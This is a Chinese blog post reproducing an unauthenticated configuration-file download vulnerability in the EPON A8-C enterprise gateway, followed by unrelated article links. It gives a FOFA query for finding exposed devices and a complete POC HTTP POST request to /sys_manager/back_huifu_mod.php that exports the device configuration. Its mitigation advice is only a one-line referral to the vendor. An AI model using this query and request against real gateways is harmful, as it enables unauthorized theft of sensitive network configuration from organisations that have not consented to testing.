【漏洞复现】EPON上行A8-C政企网关未授权下载漏洞

Nx01 产品简介

EPON上行A8-C政企网关是一款终端产品,提供企业网络解决方案。

Nx02 漏洞描述

EPON上行A8-C政企网关配置文件未授权下载漏洞,攻击者在未授权状态下下载配置文件,获取配置文件内敏感信息。

Nx03 产品主页

fofa-query: "ZXECS" && title=="Web user login"

Nx04 漏洞复现

POC:

复制代码
POST /sys_manager/back_huifu_mod.php?index_name= HTTP/1.1
Host: {{Hostname}}
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

submit_sys=%E5%AF%BC%E5%87%BA

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
Neolnfra11 分钟前
为什么现在需要卸载OpenClaw:它对你的系统安全做了什么?
安全·系统安全·openclaw
谁把我灯关了11 分钟前
【Web安全】SSTI 从零到一:模板引擎原理深度拆解与服务端模板注入全流程解析
web安全·网络安全·ssti·从0到1·模板注入
深念Y33 分钟前
从焊点加固到设备长寿:电子DIY中的机械强化与防护哲学
网络
Never_Satisfied1 小时前
在CSP中,比“self”更安全的方案:nonce 、 hash、strict-dynamic
安全
皙然2 小时前
Socket 与 WebSocket 深度解析
网络·websocket·网络协议
ren049182 小时前
网络知识和Servlet重点
网络·servlet
野犬寒鸦3 小时前
面试常问:HTTP 1.0 VS HTTP 2.0 VS HTTP 3.0 的核心区别及底层实现逻辑
服务器·开发语言·网络·后端·面试
HalvmånEver4 小时前
Linux:初始网络(上)
linux·网络·学习·通信
chenhouliu4 小时前
国外统计软件垄断高价困局:Minitab 国产替代,让制造企业省一半成本、数据更安全
安全·制造
Hello World . .4 小时前
Linux:网络编程-基于HTTP协议的天气预报查询系统开发详解
linux·网络·http